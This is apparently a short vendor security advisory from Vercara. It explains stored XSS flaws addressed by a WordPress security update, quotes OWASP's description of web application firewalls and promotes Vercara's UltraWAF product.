(TLP: CLEAR) Comments: Cross-Site Scripting (XSS) occurs when a malicious actor is able to inject script into a trusted website so that it runs in other users’ browsers with that site’s privileges. Flaws in the HTML API and the Template Part block are most likely stored (persistent) XSS: malicious markup is saved into the site’s content or templates and is then served to every visitor or administrator who loads the affected page. On WordPress, stored XSS that fires in an administrator’s browser is particularly serious, because the script can act with that administrator’s session, for example to create users or install plugins.  

(TLP: CLEAR) Recommended best practices/regulations: OWASP Web Application Firewall: “A ‘web application firewall (WAF)’ is an application firewall for HTTP applications. It applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection.  

“While proxies generally protect clients, WAFs protect servers. A WAF is deployed to protect a specific web application or set of web applications. A WAF can be considered a reverse proxy.  

“WAFs may come in the form of an appliance, server plugin, or filter and may be customized to an application. The effort to perform this customization can be significant and needs to be maintained as the application is modified.” 

(TLP: CLEAR) Vercara: Vercara’s Web Application Firewall, UltraWAF, provides protection at the application layer to detect and block DDoS attacks but also unwanted web bots and application attacks such as SQLi, XSS, and CSRF. 

Source: https://cybersecuritynews.com/wordpress-releases-urgent-security-update/ 

About Vercara.

The world’s top brands depend on Vercara to safeguard their digital infrastructure and online presence. Vercara offers a suite of cloud-delivered services that are always secure, reliable, and available and enable global businesses to thrive online. UltraSecure protects organizations’ networks and applications against risks and downtime, ensuring that businesses and their customers enjoy exceptional and uninterrupted interactions all day, every day. Delivering the industry’s best performance and always-on service, Vercara’s mission-critical security portfolio provides best-in-class DNS, application, and network security, including DDoS, WAF, and Bot management services to its global 5000 customers and beyond.

To learn more about Vercara solutions, please visit our solutions overview page or contact us.
